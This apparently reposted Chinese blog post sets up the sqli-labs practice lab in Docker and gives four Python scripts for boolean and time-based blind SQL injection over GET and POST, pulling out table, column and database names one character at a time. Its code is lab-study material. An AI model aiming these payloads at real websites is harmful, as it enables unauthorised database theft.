环境搭建
docker pull acgpiano/sqli-labs
docker run -itd --name sqli -p 9080:80 --rm acgpiano
GET型布尔盲注
import requests
for i in range(1,50):
for b in range(33,127):
payload=f"'%20and%20ascii(substr((select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name='users'),{i},1))={b}--+"
url = 'http://192.168.234.193:9080/Less-1/?id=1'+payload
result = requests.get(url=url).text
if 'Your Login name:Dumb' in result:
print(chr(b),end='')
GET型时间盲注
import requests,time
for i in range(1,50):
for b in range(33,127):
payload=f"'%20and%20if(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()),{i},1))={b},sleep(1),1)--+"
url = 'http://192.168.234.193:9080/Less-9/?id=1'+payload
ret = time.time()
result = requests.get(url=url).text
ret2 = time.time()-ret
if ret2 > 1:
print(chr(b),end='')
POST型布尔盲注
import requests
for i in range(1,50):
for b in range(32,127):
url = 'http://192.168.234.193:9080/Less-15/'
data = {
'uname': f"'or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{i},1))={b}#",
'passwd': 'adminpass',
'submit': 'Submit'
}
result = requests.post(url=url,data=data).text
if "flag" in result:
print(chr(b),end='')
POST型时间盲注
import requests,time
for i in range(1,9):
for b in range(32,127):
url = 'http://192.168.234.193:9080/Less-15/'
data = {
'uname': f"'or if(ascii(substr(database(),{i},1))={b},sleep(1),1)#",
'passwd': 'adminpass',
'submit': 'Submit'
}
ret = time.time()
result = requests.post(url=url,data=data).text
ret2 = time.time() - ret
if ret2 > 1:
print(chr(b),end='')
原文始发于微信公众号(飞奔的狸花猫):记一次使用Python编写多类型盲注脚本
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论